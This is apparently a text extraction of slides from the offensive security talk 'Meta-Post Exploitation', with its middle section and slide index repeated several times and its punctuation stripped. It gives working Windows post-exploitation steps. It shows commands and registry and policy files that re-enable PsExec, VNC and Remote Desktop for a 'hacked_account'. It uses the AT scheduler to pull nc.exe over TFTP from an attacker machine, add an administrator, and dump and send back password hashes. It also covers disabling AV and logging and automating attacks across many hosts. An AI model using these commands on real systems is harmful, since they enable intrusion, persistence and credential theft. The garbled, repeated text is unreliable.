ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
